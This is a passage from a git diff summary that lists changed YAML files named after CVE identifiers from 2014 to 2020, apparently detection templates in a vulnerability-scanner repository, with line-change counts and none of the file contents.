http/cves/2014/CVE-2014-2908.yaml | 2 +- http/cves/2014/CVE-2014-2962.yaml | 2 +- http/cves/2014/CVE-2014-3120.yaml | 2 +- http/cves/2014/CVE-2014-3206.yaml | 2 +- http/cves/2014/CVE-2014-3704.yaml | 4 +- http/cves/2014/CVE-2014-3744.yaml | 2 +- http/cves/2014/CVE-2014-4210.yaml | 2 +- http/cves/2014/CVE-2014-4513.yaml | 2 +- http/cves/2014/CVE-2014-4535.yaml | 2 +- http/cves/2014/CVE-2014-4536.yaml | 2 +- http/cves/2014/CVE-2014-4539.yaml | 2 +- http/cves/2014/CVE-2014-4544.yaml | 2 +- http/cves/2014/CVE-2014-4550.yaml | 2 +- http/cves/2014/CVE-2014-4558.yaml | 2 +- http/cves/2014/CVE-2014-4561.yaml | 2 +- http/cves/2014/CVE-2014-4592.yaml | 2 +- http/cves/2014/CVE-2014-4940.yaml | 2 +- http/cves/2014/CVE-2014-4942.yaml | 2 +- http/cves/2014/CVE-2014-5111.yaml | 2 +- http/cves/2014/CVE-2014-5258.yaml | 2 +- http/cves/2014/CVE-2014-5368.yaml | 4 +- http/cves/2014/CVE-2014-6271.yaml | 2 +- http/cves/2014/CVE-2014-6287.yaml | 2 +- http/cves/2014/CVE-2014-6308.yaml | 2 +- http/cves/2014/CVE-2014-8676.yaml | 2 +- http/cves/2014/CVE-2014-8682.yaml | 2 +- http/cves/2014/CVE-2014-8799.yaml | 2 +- http/cves/2014/CVE-2014-9094.yaml | 2 +- http/cves/2014/CVE-2014-9119.yaml | 4 +- http/cves/2014/CVE-2014-9180.yaml | 15 +- http/cves/2014/CVE-2014-9444.yaml | 2 +- http/cves/2014/CVE-2014-9606.yaml | 2 +- http/cves/2014/CVE-2014-9607.yaml | 2 +- http/cves/2014/CVE-2014-9608.yaml | 2 +- http/cves/2014/CVE-2014-9609.yaml | 2 +- http/cves/2014/CVE-2014-9614.yaml | 2 +- http/cves/2014/CVE-2014-9615.yaml | 2 +- http/cves/2014/CVE-2014-9617.yaml | 2 +- http/cves/2014/CVE-2014-9618.yaml | 2 +- http/cves/2015/CVE-2015-0554.yaml | 2 +- http/cves/2015/CVE-2015-1000005.yaml | 4 +- http/cves/2015/CVE-2015-1000010.yaml | 4 +- http/cves/2015/CVE-2015-1000012.yaml | 2 +- http/cves/2015/CVE-2015-1427.yaml | 4 +- http/cves/2015/CVE-2015-1503.yaml | 4 +- http/cves/2015/CVE-2015-1579.yaml | 2 +- http/cves/2015/CVE-2015-1880.yaml | 2 +- http/cves/2015/CVE-2015-2067.yaml | 2 +- http/cves/2015/CVE-2015-2068.yaml | 2 +- http/cves/2015/CVE-2015-2080.yaml | 2 +- http/cves/2015/CVE-2015-2166.yaml | 2 +- http/cves/2015/CVE-2015-2196.yaml | 2 +- http/cves/2015/CVE-2015-2755.yaml | 2 +- http/cves/2015/CVE-2015-2807.yaml | 2 +- http/cves/2015/CVE-2015-2863.yaml | 2 +- http/cves/2015/CVE-2015-2996.yaml | 2 +- http/cves/2015/CVE-2015-3035.yaml | 2 +- http/cves/2015/CVE-2015-3224.yaml | 4 +- http/cves/2015/CVE-2015-3337.yaml | 2 +- http/cves/2015/CVE-2015-3648.yaml | 2 +- http/cves/2015/CVE-2015-3897.yaml | 2 +- http/cves/2015/CVE-2015-4050.yaml | 2 +- http/cves/2015/CVE-2015-4062.yaml | 4 +- http/cves/2015/CVE-2015-4063.yaml | 2 +- http/cves/2015/CVE-2015-4074.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 2 +- http/cves/2015/CVE-2015-4414.yaml | 2 +- http/cves/2015/CVE-2015-4632.yaml | 4 +- http/cves/2015/CVE-2015-4666.yaml | 4 +- http/cves/2015/CVE-2015-4668.yaml | 2 +- http/cves/2015/CVE-2015-4694.yaml | 2 +- http/cves/2015/CVE-2015-5354.yaml | 2 +- http/cves/2015/CVE-2015-5461.yaml | 2 +- http/cves/2015/CVE-2015-5469.yaml | 2 +- http/cves/2015/CVE-2015-5471.yaml | 2 +- http/cves/2015/CVE-2015-5531.yaml | 4 +- http/cves/2015/CVE-2015-5688.yaml | 2 +- http/cves/2015/CVE-2015-6477.yaml | 2 +- http/cves/2015/CVE-2015-6544.yaml | 2 +- http/cves/2015/CVE-2015-6920.yaml | 2 +- http/cves/2015/CVE-2015-7245.yaml | 2 +- http/cves/2015/CVE-2015-7297.yaml | 2 +- http/cves/2015/CVE-2015-7377.yaml | 2 +- http/cves/2015/CVE-2015-7450.yaml | 4 +- http/cves/2015/CVE-2015-7780.yaml | 2 +- http/cves/2015/CVE-2015-7823.yaml | 2 +- http/cves/2015/CVE-2015-8349.yaml | 2 +- http/cves/2015/CVE-2015-8399.yaml | 2 +- http/cves/2015/CVE-2015-8813.yaml | 2 +- http/cves/2015/CVE-2015-9312.yaml | 2 +- http/cves/2015/CVE-2015-9323.yaml | 4 +- http/cves/2015/CVE-2015-9414.yaml | 2 +- http/cves/2015/CVE-2015-9480.yaml | 4 +- http/cves/2016/CVE-2016-0957.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 2 +- http/cves/2016/CVE-2016-1000127.yaml | 2 +- http/cves/2016/CVE-2016-1000128.yaml | 2 +- http/cves/2016/CVE-2016-1000129.yaml | 2 +- http/cves/2016/CVE-2016-1000130.yaml | 2 +- http/cves/2016/CVE-2016-1000131.yaml | 2 +- http/cves/2016/CVE-2016-1000132.yaml | 2 +- http/cves/2016/CVE-2016-1000133.yaml | 2 +- http/cves/2016/CVE-2016-1000134.yaml | 2 +- http/cves/2016/CVE-2016-1000135.yaml | 2 +- http/cves/2016/CVE-2016-1000136.yaml | 2 +- http/cves/2016/CVE-2016-1000137.yaml | 2 +- http/cves/2016/CVE-2016-1000138.yaml | 2 +- http/cves/2016/CVE-2016-1000139.yaml | 2 +- http/cves/2016/CVE-2016-1000140.yaml | 2 +- http/cves/2016/CVE-2016-1000141.yaml | 2 +- http/cves/2016/CVE-2016-1000142.yaml | 2 +- http/cves/2016/CVE-2016-1000143.yaml | 2 +- http/cves/2016/CVE-2016-1000146.yaml | 2 +- http/cves/2016/CVE-2016-1000148.yaml | 2 +- http/cves/2016/CVE-2016-1000149.yaml | 2 +- http/cves/2016/CVE-2016-1000152.yaml | 2 +- http/cves/2016/CVE-2016-1000153.yaml | 2 +- http/cves/2016/CVE-2016-1000154.yaml | 2 +- http/cves/2016/CVE-2016-1000155.yaml | 2 +- http/cves/2016/CVE-2016-10033.yaml | 2 +- http/cves/2016/CVE-2016-10108.yaml | 2 +- http/cves/2016/CVE-2016-10134.yaml | 2 +- http/cves/2016/CVE-2016-10367.yaml | 2 +- http/cves/2016/CVE-2016-10368.yaml | 2 +- http/cves/2016/CVE-2016-10924.yaml | 4 +- http/cves/2016/CVE-2016-10940.yaml | 4 +- http/cves/2016/CVE-2016-10956.yaml | 4 +- http/cves/2016/CVE-2016-10960.yaml | 2 +- http/cves/2016/CVE-2016-10973.yaml | 2 +- http/cves/2016/CVE-2016-10993.yaml | 2 +- http/cves/2016/CVE-2016-1555.yaml | 2 +- http/cves/2016/CVE-2016-2389.yaml | 2 +- http/cves/2016/CVE-2016-3081.yaml | 2 +- http/cves/2016/CVE-2016-3088.yaml | 2 +- http/cves/2016/CVE-2016-3978.yaml | 2 +- http/cves/2016/CVE-2016-4437.yaml | 2 +- http/cves/2016/CVE-2016-4975.yaml | 2 +- http/cves/2016/CVE-2016-4977.yaml | 2 +- http/cves/2016/CVE-2016-5649.yaml | 4 +- http/cves/2016/CVE-2016-6195.yaml | 2 +- http/cves/2016/CVE-2016-6277.yaml | 2 +- http/cves/2016/CVE-2016-6601.yaml | 4 +- http/cves/2016/CVE-2016-7552.yaml | 2 +- http/cves/2016/CVE-2016-7834.yaml | 2 +- http/cves/2016/CVE-2016-7981.yaml | 2 +- http/cves/2016/CVE-2016-8527.yaml | 4 +- http/cves/2017/CVE-2017-0929.yaml | 2 +- http/cves/2017/CVE-2017-1000028.yaml | 4 +- http/cves/2017/CVE-2017-1000029.yaml | 2 +- http/cves/2017/CVE-2017-1000163.yaml | 4 +- http/cves/2017/CVE-2017-1000170.yaml | 4 +- http/cves/2017/CVE-2017-1000486.yaml | 2 +- http/cves/2017/CVE-2017-10075.yaml | 2 +- http/cves/2017/CVE-2017-10271.yaml | 2 +- http/cves/2017/CVE-2017-10974.yaml | 2 +- http/cves/2017/CVE-2017-11165.yaml | 2 +- http/cves/2017/CVE-2017-11444.yaml | 2 +- http/cves/2017/CVE-2017-11512.yaml | 2 +- http/cves/2017/CVE-2017-11586.yaml | 2 +- http/cves/2017/CVE-2017-11610.yaml | 4 +- http/cves/2017/CVE-2017-11629.yaml | 2 +- http/cves/2017/CVE-2017-12138.yaml | 2 +- http/cves/2017/CVE-2017-12149.yaml | 4 +- http/cves/2017/CVE-2017-12542.yaml | 4 +- http/cves/2017/CVE-2017-12544.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 2 +- http/cves/2017/CVE-2017-12611.yaml | 2 +- http/cves/2017/CVE-2017-12615.yaml | 2 +- http/cves/2017/CVE-2017-12617.yaml | 4 +- http/cves/2017/CVE-2017-12629.yaml | 4 +- http/cves/2017/CVE-2017-12635.yaml | 4 +- http/cves/2017/CVE-2017-12637.yaml | 2 +- http/cves/2017/CVE-2017-12794.yaml | 2 +- http/cves/2017/CVE-2017-14135.yaml | 2 +- http/cves/2017/CVE-2017-14186.yaml | 2 +- http/cves/2017/CVE-2017-14524.yaml | 2 +- http/cves/2017/CVE-2017-14535.yaml | 2 +- http/cves/2017/CVE-2017-14537.yaml | 2 +- http/cves/2017/CVE-2017-14622.yaml | 2 +- http/cves/2017/CVE-2017-14651.yaml | 2 +- http/cves/2017/CVE-2017-14849.yaml | 2 +- http/cves/2017/CVE-2017-15287.yaml | 2 +- http/cves/2017/CVE-2017-15363.yaml | 2 +- http/cves/2017/CVE-2017-15647.yaml | 2 +- http/cves/2017/CVE-2017-15715.yaml | 4 +- http/cves/2017/CVE-2017-15944.yaml | 4 +- http/cves/2017/CVE-2017-16806.yaml | 2 +- http/cves/2017/CVE-2017-16877.yaml | 2 +- http/cves/2017/CVE-2017-16894.yaml | 2 +- http/cves/2017/CVE-2017-17043.yaml | 2 +- http/cves/2017/CVE-2017-17059.yaml | 4 +- http/cves/2017/CVE-2017-17451.yaml | 2 +- http/cves/2017/CVE-2017-17562.yaml | 2 +- http/cves/2017/CVE-2017-17731.yaml | 2 +- http/cves/2017/CVE-2017-17736.yaml | 2 +- http/cves/2017/CVE-2017-18024.yaml | 2 +- http/cves/2017/CVE-2017-18536.yaml | 2 +- http/cves/2017/CVE-2017-18598.yaml | 2 +- http/cves/2017/CVE-2017-18638.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 2 +- http/cves/2017/CVE-2017-3528.yaml | 2 +- http/cves/2017/CVE-2017-5487.yaml | 2 +- http/cves/2017/CVE-2017-5521.yaml | 2 +- http/cves/2017/CVE-2017-5631.yaml | 2 +- http/cves/2017/CVE-2017-5638.yaml | 4 +- http/cves/2017/CVE-2017-5689.yaml | 2 +- http/cves/2017/CVE-2017-5982.yaml | 2 +- http/cves/2017/CVE-2017-6090.yaml | 4 +- http/cves/2017/CVE-2017-7269.yaml | 2 +- http/cves/2017/CVE-2017-7391.yaml | 2 +- http/cves/2017/CVE-2017-7615.yaml | 2 +- http/cves/2017/CVE-2017-7921.yaml | 4 +- http/cves/2017/CVE-2017-7925.yaml | 2 +- http/cves/2017/CVE-2017-8229.yaml | 6 +- http/cves/2017/CVE-2017-8917.yaml | 2 +- http/cves/2017/CVE-2017-9140.yaml | 2 +- http/cves/2017/CVE-2017-9288.yaml | 2 +- http/cves/2017/CVE-2017-9416.yaml | 2 +- http/cves/2017/CVE-2017-9506.yaml | 2 +- http/cves/2017/CVE-2017-9791.yaml | 4 +- http/cves/2017/CVE-2017-9805.yaml | 4 +- http/cves/2017/CVE-2017-9822.yaml | 4 +- http/cves/2017/CVE-2017-9833.yaml | 4 +- http/cves/2017/CVE-2017-9841.yaml | 4 +- http/cves/2018/CVE-2018-0127.yaml | 6 +- http/cves/2018/CVE-2018-0296.yaml | 2 +- http/cves/2018/CVE-2018-1000129.yaml | 2 +- http/cves/2018/CVE-2018-1000130.yaml | 2 +- http/cves/2018/CVE-2018-1000226.yaml | 2 +- http/cves/2018/CVE-2018-1000533.yaml | 2 +- http/cves/2018/CVE-2018-1000600.yaml | 2 +- http/cves/2018/CVE-2018-1000671.yaml | 4 +- http/cves/2018/CVE-2018-1000856.yaml | 2 +- http/cves/2018/CVE-2018-1000861.yaml | 4 +- http/cves/2018/CVE-2018-10093.yaml | 2 +- http/cves/2018/CVE-2018-10095.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 2 +- http/cves/2018/CVE-2018-10201.yaml | 4 +- http/cves/2018/CVE-2018-10230.yaml | 2 +- http/cves/2018/CVE-2018-10562.yaml | 4 +- http/cves/2018/CVE-2018-10822.yaml | 4 +- http/cves/2018/CVE-2018-10823.yaml | 4 +- http/cves/2018/CVE-2018-10956.yaml | 2 +- http/cves/2018/CVE-2018-11227.yaml | 2 +- http/cves/2018/CVE-2018-11231.yaml | 2 +- http/cves/2018/CVE-2018-11409.yaml | 4 +- http/cves/2018/CVE-2018-11473.yaml | 2 +- http/cves/2018/CVE-2018-11709.yaml | 2 +- http/cves/2018/CVE-2018-11759.yaml | 4 +- http/cves/2018/CVE-2018-11776.yaml | 2 +- http/cves/2018/CVE-2018-11784.yaml | 4 +- http/cves/2018/CVE-2018-12031.yaml | 2 +- http/cves/2018/CVE-2018-12054.yaml | 2 +- http/cves/2018/CVE-2018-1207.yaml | 4 +- http/cves/2018/CVE-2018-12095.yaml | 2 +- http/cves/2018/CVE-2018-12296.yaml | 4 +- http/cves/2018/CVE-2018-12300.yaml | 2 +- http/cves/2018/CVE-2018-12613.yaml | 4 +- http/cves/2018/CVE-2018-12634.yaml | 2 +- http/cves/2018/CVE-2018-12675.yaml | 2 +- http/cves/2018/CVE-2018-1271.yaml | 4 +- http/cves/2018/CVE-2018-1273.yaml | 4 +- http/cves/2018/CVE-2018-12909.yaml | 2 +- http/cves/2018/CVE-2018-12998.yaml | 2 +- http/cves/2018/CVE-2018-1335.yaml | 4 +- http/cves/2018/CVE-2018-13379.yaml | 4 +- http/cves/2018/CVE-2018-13380.yaml | 2 +- http/cves/2018/CVE-2018-13980.yaml | 2 +- http/cves/2018/CVE-2018-14013.yaml | 2 +- http/cves/2018/CVE-2018-14064.yaml | 4 +- http/cves/2018/CVE-2018-14474.yaml | 2 +- http/cves/2018/CVE-2018-14574.yaml | 2 +- http/cves/2018/CVE-2018-14728.yaml | 4 +- http/cves/2018/CVE-2018-14912.yaml | 4 +- http/cves/2018/CVE-2018-14916.yaml | 2 +- http/cves/2018/CVE-2018-14918.yaml | 2 +- http/cves/2018/CVE-2018-14931.yaml | 2 +- http/cves/2018/CVE-2018-15138.yaml | 4 +- http/cves/2018/CVE-2018-15517.yaml | 2 +- http/cves/2018/CVE-2018-15535.yaml | 2 +- http/cves/2018/CVE-2018-15745.yaml | 4 +- http/cves/2018/CVE-2018-15917.yaml | 6 + http/cves/2018/CVE-2018-15961.yaml | 4 +- http/cves/2018/CVE-2018-16059.yaml | 4 +- http/cves/2018/CVE-2018-16133.yaml | 4 +- http/cves/2018/CVE-2018-16139.yaml | 2 +- http/cves/2018/CVE-2018-16159.yaml | 2 +- http/cves/2018/CVE-2018-16167.yaml | 4 +- http/cves/2018/CVE-2018-16283.yaml | 4 +- http/cves/2018/CVE-2018-16288.yaml | 4 +- http/cves/2018/CVE-2018-16299.yaml | 4 +- http/cves/2018/CVE-2018-16668.yaml | 4 +- http/cves/2018/CVE-2018-16670.yaml | 4 +- http/cves/2018/CVE-2018-16671.yaml | 4 +- http/cves/2018/CVE-2018-16716.yaml | 4 +- http/cves/2018/CVE-2018-16761.yaml | 2 +- http/cves/2018/CVE-2018-16763.yaml | 4 +- http/cves/2018/CVE-2018-16836.yaml | 2 +- http/cves/2018/CVE-2018-16979.yaml | 2 +- http/cves/2018/CVE-2018-17153.yaml | 6 +- http/cves/2018/CVE-2018-17246.yaml | 2 +- http/cves/2018/CVE-2018-17254.yaml | 2 +- http/cves/2018/CVE-2018-17422.yaml | 2 +- http/cves/2018/CVE-2018-17431.yaml | 2 +- http/cves/2018/CVE-2018-18069.yaml | 2 +- http/cves/2018/CVE-2018-18264.yaml | 4 +- http/cves/2018/CVE-2018-18323.yaml | 2 +- http/cves/2018/CVE-2018-18570.yaml | 2 +- http/cves/2018/CVE-2018-18608.yaml | 2 +- http/cves/2018/CVE-2018-18775.yaml | 4 +- http/cves/2018/CVE-2018-18777.yaml | 4 +- http/cves/2018/CVE-2018-18778.yaml | 2 +- http/cves/2018/CVE-2018-18809.yaml | 4 +- http/cves/2018/CVE-2018-18925.yaml | 4 +- http/cves/2018/CVE-2018-19136.yaml | 4 +- http/cves/2018/CVE-2018-19137.yaml | 2 +- http/cves/2018/CVE-2018-19287.yaml | 4 +- http/cves/2018/CVE-2018-19326.yaml | 4 +- http/cves/2018/CVE-2018-19365.yaml | 2 +- http/cves/2018/CVE-2018-19386.yaml | 2 +- http/cves/2018/CVE-2018-19439.yaml | 2 +- http/cves/2018/CVE-2018-19458.yaml | 4 +- http/cves/2018/CVE-2018-19749.yaml | 4 +- http/cves/2018/CVE-2018-19751.yaml | 4 +- http/cves/2018/CVE-2018-19752.yaml | 4 +- http/cves/2018/CVE-2018-19753.yaml | 4 +- http/cves/2018/CVE-2018-19877.yaml | 2 +- http/cves/2018/CVE-2018-19892.yaml | 2 +- http/cves/2018/CVE-2018-19914.yaml | 4 +- http/cves/2018/CVE-2018-19915.yaml | 4 +- http/cves/2018/CVE-2018-20009.yaml | 2 +- http/cves/2018/CVE-2018-20010.yaml | 2 +- http/cves/2018/CVE-2018-20011.yaml | 2 +- http/cves/2018/CVE-2018-20462.yaml | 2 +- http/cves/2018/CVE-2018-20463.yaml | 4 +- http/cves/2018/CVE-2018-20470.yaml | 2 +- http/cves/2018/CVE-2018-20526.yaml | 2 +- http/cves/2018/CVE-2018-20608.yaml | 2 +- http/cves/2018/CVE-2018-20824.yaml | 2 +- http/cves/2018/CVE-2018-20985.yaml | 4 +- http/cves/2018/CVE-2018-2392.yaml | 4 +- http/cves/2018/CVE-2018-2791.yaml | 4 +- http/cves/2018/CVE-2018-2894.yaml | 4 +- http/cves/2018/CVE-2018-3167.yaml | 4 +- http/cves/2018/CVE-2018-3238.yaml | 4 +- http/cves/2018/CVE-2018-3714.yaml | 2 +- http/cves/2018/CVE-2018-3760.yaml | 2 +- http/cves/2018/CVE-2018-3810.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 2 +- http/cves/2018/CVE-2018-5233.yaml | 2 +- http/cves/2018/CVE-2018-5316.yaml | 2 +- http/cves/2018/CVE-2018-5715.yaml | 2 +- http/cves/2018/CVE-2018-6008.yaml | 2 +- http/cves/2018/CVE-2018-6184.yaml | 2 +- http/cves/2018/CVE-2018-6200.yaml | 2 +- http/cves/2018/CVE-2018-6530.yaml | 2 +- http/cves/2018/CVE-2018-6910.yaml | 2 +- http/cves/2018/CVE-2018-7251.yaml | 2 +- http/cves/2018/CVE-2018-7422.yaml | 2 +- http/cves/2018/CVE-2018-7467.yaml | 2 +- http/cves/2018/CVE-2018-7490.yaml | 4 +- http/cves/2018/CVE-2018-7600.yaml | 4 +- http/cves/2018/CVE-2018-7602.yaml | 2 +- http/cves/2018/CVE-2018-7653.yaml | 2 +- http/cves/2018/CVE-2018-7662.yaml | 2 +- http/cves/2018/CVE-2018-7700.yaml | 2 +- http/cves/2018/CVE-2018-7719.yaml | 2 +- http/cves/2018/CVE-2018-8006.yaml | 4 +- http/cves/2018/CVE-2018-8033.yaml | 4 +- http/cves/2018/CVE-2018-8715.yaml | 2 +- http/cves/2018/CVE-2018-8719.yaml | 2 +- http/cves/2018/CVE-2018-8727.yaml | 2 +- http/cves/2018/CVE-2018-8770.yaml | 2 +- http/cves/2018/CVE-2018-9118.yaml | 4 +- http/cves/2018/CVE-2018-9161.yaml | 2 +- http/cves/2018/CVE-2018-9205.yaml | 2 +- http/cves/2018/CVE-2018-9845.yaml | 4 +- http/cves/2018/CVE-2018-9995.yaml | 4 +- http/cves/2019/CVE-2019-0193.yaml | 4 +- http/cves/2019/CVE-2019-0221.yaml | 2 +- http/cves/2019/CVE-2019-0230.yaml | 4 +- http/cves/2019/CVE-2019-10068.yaml | 4 +- http/cves/2019/CVE-2019-10092.yaml | 2 +- http/cves/2019/CVE-2019-10098.yaml | 4 +- http/cves/2019/CVE-2019-1010287.yaml | 2 +- http/cves/2019/CVE-2019-1010290.yaml | 2 +- http/cves/2019/CVE-2019-10232.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 2 +- http/cves/2019/CVE-2019-10475.yaml | 2 +- http/cves/2019/CVE-2019-10692.yaml | 2 +- http/cves/2019/CVE-2019-10717.yaml | 2 +- http/cves/2019/CVE-2019-10758.yaml | 4 +- http/cves/2019/CVE-2019-11013.yaml | 2 +- http/cves/2019/CVE-2019-11248.yaml | 2 +- http/cves/2019/CVE-2019-11370.yaml | 2 +- http/cves/2019/CVE-2019-11510.yaml | 4 +- http/cves/2019/CVE-2019-11580.yaml | 7 +- http/cves/2019/CVE-2019-11581.yaml | 4 +- http/cves/2019/CVE-2019-11869.yaml | 2 +- http/cves/2019/CVE-2019-12276.yaml | 2 +- http/cves/2019/CVE-2019-12314.yaml | 4 +- http/cves/2019/CVE-2019-12461.yaml | 2 +- http/cves/2019/CVE-2019-12581.yaml | 2 +- http/cves/2019/CVE-2019-12583.yaml | 2 +- http/cves/2019/CVE-2019-12593.yaml | 2 +- http/cves/2019/CVE-2019-12616.yaml | 4 +- http/cves/2019/CVE-2019-12725.yaml | 4 +- http/cves/2019/CVE-2019-12962.yaml | 2 +- http/cves/2019/CVE-2019-12985.yaml | 2 +- http/cves/2019/CVE-2019-12986.yaml | 2 +- http/cves/2019/CVE-2019-12987.yaml | 2 +- http/cves/2019/CVE-2019-12988.yaml | 2 +- http/cves/2019/CVE-2019-12990.yaml | 2 +- http/cves/2019/CVE-2019-13101.yaml | 2 +- http/cves/2019/CVE-2019-13392.yaml | 2 +- http/cves/2019/CVE-2019-13396.yaml | 2 +- http/cves/2019/CVE-2019-13462.yaml | 4 +- http/cves/2019/CVE-2019-14205.yaml | 2 +- http/cves/2019/CVE-2019-14223.yaml | 2 +- http/cves/2019/CVE-2019-14251.yaml | 2 +- http/cves/2019/CVE-2019-14312.yaml | 2 +- http/cves/2019/CVE-2019-14322.yaml | 2 +- http/cves/2019/CVE-2019-14470.yaml | 4 +- http/cves/2019/CVE-2019-14530.yaml | 4 +- http/cves/2019/CVE-2019-14696.yaml | 2 +- http/cves/2019/CVE-2019-14750.yaml | 2 +- http/cves/2019/CVE-2019-14789.yaml | 2 +- http/cves/2019/CVE-2019-14974.yaml | 2 +- http/cves/2019/CVE-2019-15043.yaml | 4 +- http/cves/2019/CVE-2019-15107.yaml | 4 +- http/cves/2019/CVE-2019-15501.yaml | 2 +- http/cves/2019/CVE-2019-15642.yaml | 2 +- http/cves/2019/CVE-2019-15713.yaml | 2 +- http/cves/2019/CVE-2019-15811.yaml | 2 +- http/cves/2019/CVE-2019-15858.yaml | 2 +- http/cves/2019/CVE-2019-15859.yaml | 2 +- http/cves/2019/CVE-2019-15889.yaml | 4 +- http/cves/2019/CVE-2019-16057.yaml | 4 +- http/cves/2019/CVE-2019-16097.yaml | 2 +- http/cves/2019/CVE-2019-16123.yaml | 2 +- http/cves/2019/CVE-2019-16278.yaml | 4 +- http/cves/2019/CVE-2019-16313.yaml | 4 +- http/cves/2019/CVE-2019-16332.yaml | 2 +- http/cves/2019/CVE-2019-16525.yaml | 2 +- http/cves/2019/CVE-2019-1653.yaml | 2 +- http/cves/2019/CVE-2019-16662.yaml | 2 +- http/cves/2019/CVE-2019-16759.yaml | 2 +- http/cves/2019/CVE-2019-16920.yaml | 4 +- http/cves/2019/CVE-2019-16931.yaml | 2 +- http/cves/2019/CVE-2019-16932.yaml | 2 +- http/cves/2019/CVE-2019-16996.yaml | 4 +- http/cves/2019/CVE-2019-16997.yaml | 4 +- http/cves/2019/CVE-2019-17270.yaml | 4 +- http/cves/2019/CVE-2019-17382.yaml | 4 +- http/cves/2019/CVE-2019-17418.yaml | 4 +- http/cves/2019/CVE-2019-17444.yaml | 4 +- http/cves/2019/CVE-2019-17503.yaml | 2 +- http/cves/2019/CVE-2019-17506.yaml | 4 +- http/cves/2019/CVE-2019-17538.yaml | 2 +- http/cves/2019/CVE-2019-17558.yaml | 4 +- http/cves/2019/CVE-2019-17574.yaml | 2 +- http/cves/2019/CVE-2019-17662.yaml | 4 +- http/cves/2019/CVE-2019-1821.yaml | 2 +- http/cves/2019/CVE-2019-18371.yaml | 4 +- http/cves/2019/CVE-2019-18393.yaml | 2 +- http/cves/2019/CVE-2019-18394.yaml | 4 +- http/cves/2019/CVE-2019-18665.yaml | 2 +- http/cves/2019/CVE-2019-18818.yaml | 4 +- http/cves/2019/CVE-2019-18922.yaml | 4 +- http/cves/2019/CVE-2019-18957.yaml | 4 +- http/cves/2019/CVE-2019-1898.yaml | 4 +- http/cves/2019/CVE-2019-19134.yaml | 2 +- http/cves/2019/CVE-2019-19368.yaml | 4 +- http/cves/2019/CVE-2019-1943.yaml | 2 +- http/cves/2019/CVE-2019-19781.yaml | 4 +- http/cves/2019/CVE-2019-19824.yaml | 4 +- http/cves/2019/CVE-2019-19908.yaml | 2 +- http/cves/2019/CVE-2019-19985.yaml | 4 +- http/cves/2019/CVE-2019-20085.yaml | 4 +- http/cves/2019/CVE-2019-20141.yaml | 2 +- http/cves/2019/CVE-2019-20183.yaml | 2 +- http/cves/2019/CVE-2019-20210.yaml | 4 +- http/cves/2019/CVE-2019-20224.yaml | 4 +- http/cves/2019/CVE-2019-20933.yaml | 2 +- http/cves/2019/CVE-2019-2578.yaml | 4 +- http/cves/2019/CVE-2019-2579.yaml | 2 +- http/cves/2019/CVE-2019-2588.yaml | 4 +- http/cves/2019/CVE-2019-2616.yaml | 4 +- http/cves/2019/CVE-2019-2725.yaml | 4 +- http/cves/2019/CVE-2019-2729.yaml | 4 +- http/cves/2019/CVE-2019-2767.yaml | 2 +- http/cves/2019/CVE-2019-3396.yaml | 4 +- http/cves/2019/CVE-2019-3398.yaml | 4 +- http/cves/2019/CVE-2019-3401.yaml | 4 +- http/cves/2019/CVE-2019-3402.yaml | 4 +- http/cves/2019/CVE-2019-3403.yaml | 4 +- http/cves/2019/CVE-2019-3799.yaml | 4 +- http/cves/2019/CVE-2019-3911.yaml | 2 +- http/cves/2019/CVE-2019-3912.yaml | 2 +- http/cves/2019/CVE-2019-3929.yaml | 6 +- http/cves/2019/CVE-2019-5127.yaml | 4 +- http/cves/2019/CVE-2019-5418.yaml | 5 +- http/cves/2019/CVE-2019-5434.yaml | 2 +- http/cves/2019/CVE-2019-6112.yaml | 2 +- http/cves/2019/CVE-2019-6340.yaml | 4 +- http/cves/2019/CVE-2019-6715.yaml | 2 +- http/cves/2019/CVE-2019-6799.yaml | 2 +- http/cves/2019/CVE-2019-6802.yaml | 2 +- http/cves/2019/CVE-2019-7192.yaml | 2 +- http/cves/2019/CVE-2019-7219.yaml | 2 +- http/cves/2019/CVE-2019-7238.yaml | 2 +- http/cves/2019/CVE-2019-7254.yaml | 4 +- http/cves/2019/CVE-2019-7255.yaml | 2 +- http/cves/2019/CVE-2019-7256.yaml | 4 +- http/cves/2019/CVE-2019-7275.yaml | 2 +- http/cves/2019/CVE-2019-7315.yaml | 4 +- http/cves/2019/CVE-2019-7481.yaml | 4 +- http/cves/2019/CVE-2019-7543.yaml | 2 +- http/cves/2019/CVE-2019-7609.yaml | 4 +- http/cves/2019/CVE-2019-8086.yaml | 2 +- http/cves/2019/CVE-2019-8390.yaml | 4 +- http/cves/2019/CVE-2019-8442.yaml | 2 +- http/cves/2019/CVE-2019-8446.yaml | 4 +- http/cves/2019/CVE-2019-8449.yaml | 4 +- http/cves/2019/CVE-2019-8451.yaml | 2 +- http/cves/2019/CVE-2019-8903.yaml | 4 +- http/cves/2019/CVE-2019-8937.yaml | 2 +- http/cves/2019/CVE-2019-8982.yaml | 2 +- http/cves/2019/CVE-2019-9041.yaml | 10 +- http/cves/2019/CVE-2019-9618.yaml | 2 +- http/cves/2019/CVE-2019-9670.yaml | 4 +- http/cves/2019/CVE-2019-9726.yaml | 2 +- http/cves/2019/CVE-2019-9733.yaml | 2 +- http/cves/2019/CVE-2019-9915.yaml | 4 +- http/cves/2019/CVE-2019-9922.yaml | 4 +- http/cves/2019/CVE-2019-9955.yaml | 4 +- http/cves/2019/CVE-2019-9978.yaml | 4 +- http/cves/2020/CVE-2020-0618.yaml | 4 +- http/cves/2020/CVE-2020-10148.yaml | 4 +- http/cves/2020/CVE-2020-10199.yaml | 6 +- http/cves/2020/CVE-2020-10220.yaml | 10 +- http/cves/2020/CVE-2020-10546.yaml | 4 +- http/cves/2020/CVE-2020-10547.yaml | 4 +- http/cves/2020/CVE-2020-10548.yaml | 4 +- http/cves/2020/CVE-2020-10549.yaml | 4 +- http/cves/2020/CVE-2020-10770.yaml | 4 +- http/cves/2020/CVE-2020-10973.yaml | 4 +- http/cves/2020/CVE-2020-11034.yaml | 4 +- http/cves/2020/CVE-2020-11110.yaml | 4 +- http/cves/2020/CVE-2020-11450.yaml | 4 +- http/cves/2020/CVE-2020-11455.yaml | 4 +- http/cves/2020/CVE-2020-11529.yaml | 2 +- http/cves/2020/CVE-2020-11530.yaml | 4 +- http/cves/2020/CVE-2020-11546.yaml | 2 